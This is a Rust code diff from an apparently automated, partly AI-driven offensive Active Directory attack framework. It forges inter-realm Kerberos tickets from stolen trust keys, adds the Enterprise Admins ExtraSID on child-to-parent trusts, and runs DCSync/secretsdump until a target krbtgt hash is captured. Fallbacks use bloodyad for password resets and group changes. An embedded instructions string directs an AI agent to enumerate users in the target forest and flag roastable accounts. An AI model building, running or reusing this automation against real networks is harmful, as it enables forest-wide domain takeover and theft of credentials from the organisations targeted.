+ // sequentially in one worker invocation (shared tempdir as cwd),
+ // so the .ccache produced by ticketer is on the same filesystem
+ // when secretsdump reads it. Two split dispatch_tool calls would
+ // land on different worker pods with no shared FS.
+ let mut tool_args = json!({
+ "source_domain": &item.source_domain,
+ "target_domain": &item.target_domain,
+ "trust_key": &item.hash.hash_value,
+ "username": ticket_username,
+ // `target` is the DC hostname (or IP fallback) for the SPN
+ // baked into the ticket; `dc_ip` is the routable IP used
+ // for impacket-secretsdump's `-dc-ip`.
+ "target": &target_dc_hostname,
+ "dc_ip": &target_dc_ip,
+ });
+ if let Some(ref sid) = source_domain_sid {
+ tool_args["source_sid"] = json!(sid);
+ }
+ if let Some(ref sid) = target_domain_sid {
+ tool_args["target_sid"] = json!(sid);
+ }
+ // AES256 trust key — required for Win2016+ target DCs which
+ // reject RC4-only inter-realm tickets with KDC_ERR_TGT_REVOKED.
+ // resolved_aes_key prefers item.hash.aes_key, then re-reads
+ // state.hashes for an AES-equipped variant (handles the race
+ // where secretsdump's second pass upserts AES after work was
+ // collected).
+ if let Some(ref aes) = resolved_aes_key {
+ tool_args["aes_key"] = json!(aes);
+ }
+ // For child→parent trusts (intra-forest), inject parent's
+ // Enterprise Admins SID (RID 519). SID filtering blocks
+ // ExtraSID across forest trusts, so only emit on intra-forest.
+ // The defer above guarantees target_domain_sid is Some here
+ // when is_child_to_parent.
+ if is_child_to_parent {
+ if let Some(ref tsid) = target_domain_sid {
+ tool_args["extra_sid"] = json!(format!("{tsid}-519"));
+ }
+ }
+ let _ = ticket_path; // ccache path is internal to the tool
+ let _ = trust_target;
+
+ let call = ToolCall {
+ id: format!("forge_inter_realm_{}", uuid::Uuid::new_v4().simple()),
+ name: "forge_inter_realm_and_dump".to_string(),
+ arguments: tool_args,
+ };
+ let task_id = format!(
+ "trust_forge_{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..12]
+ );
+
+ // Mark dedup BEFORE spawning so the next 30s tick doesn't
+ // re-dispatch the same trust while the forge is running.
dispatcher
.state
.write()
@@ -800,6 +1813,211 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
.state
.persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key)
.await;
+
+ info!(
+ task_id = %task_id,
+ trust_account = %item.hash.username,
+ source_domain = %item.source_domain,
+ target_domain = %item.target_domain,
+ has_source_sid = source_domain_sid.is_some(),
+ has_target_sid = target_domain_sid.is_some(),
+ has_aes = resolved_aes_key.is_some(),
+ "Cross-forest forge dispatched (direct tool, no LLM)"
+ );
+
+ let dispatcher_bg = dispatcher.clone();
+ let source_domain_bg = item.source_domain.clone();
+ let target_domain_bg = item.target_domain.clone();
+ let trust_account_bg = item.hash.username.clone();
+ let vuln_id_bg = vuln_id.clone();
+ let dedup_key_bg = item.dedup_key.clone();
+ let trust_key_bg = item.hash.hash_value.clone();
+ let aes_key_bg = resolved_aes_key.clone();
+ let source_domain_sid_bg = source_domain_sid.clone();
+ tokio::spawn(async move {
+ let result = dispatcher_bg
+ .llm_runner
+ .tool_dispatcher()
+ .dispatch_tool("privesc", &task_id, &call)
+ .await;
+ // Clear dedup on failure so the next 30s tick can retry once
+ // a fresh trust key, AES key, or SID becomes available.
+ let clear_dedup = || async {
+ dispatcher_bg
+ .state
+ .write()
+ .await
+ .unmark_processed(DEDUP_TRUST_FOLLOW, &dedup_key_bg);
+ let _ = dispatcher_bg
+ .state
+ .unpersist_dedup(&dispatcher_bg.queue, DEDUP_TRUST_FOLLOW, &dedup_key_bg)
+ .await;
+ };
+ match result {
+ Ok(exec_result) => {
+ if let Some(err) = exec_result.error.as_ref() {
+ let tail: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::()
+ .chars()
+ .rev()
+ .collect();
+ warn!(
+ err = %err,
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ trust_account = %trust_account_bg,
+ output_tail = %tail,
+ "forge_inter_realm_and_dump returned error — clearing dedup for retry"
+ );
+ clear_dedup().await;
+ return;
+ }
+ // Verify target compromise — only mark exploited
+ // when we actually observe the target krbtgt hash
+ // in the dispatch_tool discoveries.
+ let target_lower = target_domain_bg.to_lowercase();
+ let has_target_krbtgt = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("hashes"))
+ .and_then(|h| h.as_array())
+ .map(|hashes| {
+ hashes.iter().any(|h| {
+ let user =
+ h.get("username").and_then(|v| v.as_str()).unwrap_or("");
+ let dom =
+ h.get("domain").and_then(|v| v.as_str()).unwrap_or("");
+ let htype =
+ h.get("hash_type").and_then(|v| v.as_str()).unwrap_or("");
+ user.eq_ignore_ascii_case("krbtgt")
+ && dom.to_lowercase() == target_lower
+ && htype.eq_ignore_ascii_case("ntlm")
+ })
+ })
+ .unwrap_or(false);
+ if has_target_krbtgt {
+ info!(
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ "Cross-forest forge compromised target — marking exploited"
+ );
+ let _ = dispatcher_bg
+ .state
+ .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+ .await;
+ let techniques = vec!["T1134.005".to_string(), "T1550.003".to_string()];
+ let event_id = format!(
+ "evt-trust-{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..8]
+ );
+ let event = serde_json::json!({
+ "id": event_id,
+ "timestamp": chrono::Utc::now().to_rfc3339(),
+ "source": "trust_automation",
+ "description": format!(
+ "Forest trust escalation: {} \u{2192} {} via trust key {}",
+ source_domain_bg, target_domain_bg, trust_account_bg
+ ),
+ "mitre_techniques": techniques,
+ });
+ let _ = dispatcher_bg
+ .state
+ .persist_timeline_event(&dispatcher_bg.queue, &event, &techniques)
+ .await;
+ } else {
+ // Tool ran cleanly but no target krbtgt landed in
+ // discoveries — this is a deterministic failure
+ // (SID filtering, denied permissions, or wrong
+ // forest) that won't change on the next 30s tick.
+ // Keep dedup MARKED so we don't relitigate the
+ // doomed forge in a tight loop, mark the trust
+ // vuln exploited so the operation moves on, and
+ // wake the cross-forest fallback paths
+ // (ACL/MSSQL/FSP) which can still compromise the
+ // target forest without ExtraSid.
+ //
+ // Surface tool stdout tail + a hash-count summary so
+ // post-mortem can distinguish silent nxc failure
+ // (empty output) from auth-denied (nxc printed
+ // STATUS_LOGON_FAILURE / rpc_s_access_denied) from
+ // partial dumps (got hashes but no krbtgt — usually
+ // a cross-forest no-ExtraSid case where the target
+ // KDC issued a TGS but DRSUAPI rejected replication).
+ let tail: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::()
+ .chars()
+ .rev()
+ .collect();
+ let hash_count = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("hashes"))
+ .and_then(|h| h.as_array())
+ .map(|a| a.len())
+ .unwrap_or(0);
+ warn!(
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ hash_count,
+ output_tail = %tail,
+ "forge_inter_realm_and_dump completed but no target krbtgt observed — locking dedup, waking fallbacks (vuln NOT marked exploited; only target krbtgt capture proves compromise)"
+ );
+ let _ = vuln_id_bg; // intentionally unused — see comment above
+
+ // Dump-phase failure (SID filtering missed by
+ // is_filtered_inter_forest_trust, DRSUAPI denial
+ // despite a valid TGS, or any other reason DCSync
+ // returned 0 hashes) leaves the foreign forest
+ // attackable via Kerberos LDAP bind. Dispatch
+ // create_inter_realm_ticket so downstream tools
+ // (bloodyad -k, etc.) get a usable ccache. Without
+ // this, wake_cross_forest_fallbacks below is a
+ // no-op when no same-realm credential bound the
+ // ACL/foreign-group/cross-forest enums to the
+ // target — the case that left fabrikam.local
+ // permanently un-attackable in op-20260502-013857.
+ {
+ let dispatcher_fb = dispatcher_bg.clone();
+ let source_domain_fb = source_domain_bg.clone();
+ let target_domain_fb = target_domain_bg.clone();
+ let trust_key_fb = trust_key_bg.clone();
+ let aes_key_fb = aes_key_bg.clone();
+ let source_domain_sid_fb = source_domain_sid_bg.clone();
+ tokio::spawn(async move {
+ dispatch_create_inter_realm_ticket(
+ &dispatcher_fb,
+ &source_domain_fb,
+ &target_domain_fb,
+ &trust_key_fb,
+ aes_key_fb.as_deref(),
+ source_domain_sid_fb.as_deref(),
+ )
+ .await;
+ });
+ }
+
+ wake_cross_forest_fallbacks(&dispatcher_bg, &target_domain_bg).await;
+ }
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ source_domain = %source_domain_bg,
+ target_domain = %target_domain_bg,
+ "forge_inter_realm_and_dump dispatch errored — clearing dedup for retry"
+ );
+ clear_dedup().await;
+ }
+ }
+ });
}
}
}
@@ -812,7 +2030,311 @@ struct TrustFollowWork {
target_dc_ip: Option,
source_domain_sid: Option,
target_domain_sid: Option,
- source_dc_ip: Option,
+}
+
+/// Submit a cross-forest user-enumeration recon task immediately after a
+/// successful inter-realm ticket forge.
+///
+/// Without this, `auto_cross_forest_enum` would refuse to dispatch (its
+/// `best_cred` returns None when the target forest has no credentials in
+/// state) and the freshly-forged ticket would sit idle. This helper queues
+/// the same `ldap_user_enumeration` recon payload using any usable
+/// source-domain credential as a placeholder; the credential resolver
+/// detects the cross-forest LDAP tool, finds no NTLM hash for the target,
+/// and injects the inter-realm ccache via `resolve_cross_forest_ticket`.
+async fn dispatch_post_ticket_user_enumeration(
+ dispatcher: &Dispatcher,
+ source_domain: &str,
+ target_domain: &str,
+) {
+ let target_lower = target_domain.to_lowercase();
+
+ let (target_dc_ip, target_dc_fqdn, source_cred) = {
+ let s = dispatcher.state.read().await;
+ let Some(dc_ip) = s.resolve_dc_ip(target_domain) else {
+ warn!(
+ source_domain,
+ target_domain, "post-ticket user-enum skipped: no DC IP for target domain"
+ );
+ return;
+ };
+ let dc_fqdn = s
+ .hosts
+ .iter()
+ .find(|h| h.ip == dc_ip && !h.hostname.is_empty())
+ .map(|h| {
+ let hn = h.hostname.to_lowercase();
+ if hn.ends_with(&format!(".{target_lower}")) || hn == target_lower {
+ hn
+ } else {
+ format!("{hn}.{target_lower}")
+ }
+ });
+ // Pick any non-empty-password credential from the source forest. The
+ // resolver will swap the cred for the ticket; what matters is that
+ // bind_domain ends up != target_domain so the cross-forest path is
+ // taken. We accept child-domain creds (e.g. child.contoso.local
+ // when source is contoso.local) because intermediate ops often
+ // only own the child realm — the trust key extraction still uses the
+ // parent's outbound trust, but state.credentials only holds the
+ // identities we cracked along the way.
+ let cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && is_domain_related(&c.domain, source_domain)
+ && !s.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned();
+ (dc_ip, dc_fqdn, cred)
+ };
+
+ let Some(cred) = source_cred else {
+ warn!(
+ source_domain,
+ target_domain,
+ "post-ticket user-enum skipped: no source-domain credential to seed the task"
+ );
+ return;
+ };
+
+ let target = target_dc_fqdn.unwrap_or_else(|| target_dc_ip.clone());
+
+ let payload = json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": target,
+ "domain": target_domain,
+ "bind_domain": source_domain,
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ "filters": ["(objectCategory=person)(objectClass=user)"],
+ "attributes": [
+ "sAMAccountName", "description", "memberOf",
+ "userAccountControl", "servicePrincipalName",
+ "msDS-AllowedToDelegateTo", "adminCount"
+ ],
+ "cross_forest": true,
+ "instructions": concat!(
+ "Cross-forest user enumeration after inter-realm Kerberos ticket forge. ",
+ "An inter-realm ccache for this target domain has been pre-cached and ",
+ "will be auto-injected by the credential resolver. Use ",
+ "`ldap_search_descriptions` (or `ldap_search`) against the target DC ",
+ "FQDN — these tools perform GSSAPI bind with the injected ticket. Do ",
+ "NOT use the supplied password credential for the bind (it is from a ",
+ "different forest and will be rejected); the ticket handles auth.\n\n",
+ "Report every user found with EXACTLY this JSON format in ",
+ "discovered_users:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"target.domain\", ",
+ "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\"]}\n",
+ "Flag DoesNotRequirePreAuth as vuln_type='asrep_roastable' and SPNs as ",
+ "vuln_type='kerberoastable'."
+ ),
+ });
+
+ let priority = dispatcher.effective_priority("cross_forest_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ source_domain,
+ target_domain,
+ target_dc = %target,
+ "Post-ticket cross-forest user enumeration dispatched"
+ );
+ }
+ Ok(None) => {
+ debug!(
+ source_domain,
+ target_domain, "Post-ticket user-enum deferred by throttling"
+ );
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ source_domain,
+ target_domain,
+ "Failed to submit post-ticket user-enum task"
+ );
+ }
+ }
+}
+
+/// Forge an inter-realm Kerberos ticket for a SID-filtered cross-forest trust.
+///
+/// Called from the suppression branch of `auto_trust_follow` when
+/// `is_filtered_inter_forest_trust` is true. The ExtraSid DCSync path is
+/// blocked by SID filtering, but a plain inter-realm TGT is still useful:
+/// bloodyad with `-k` can perform Kerberos LDAP bind against the target DC
+/// as Administrator, enabling password resets and group membership changes.
+///
+/// The ticket is written to `/tmp/ares-tickets/__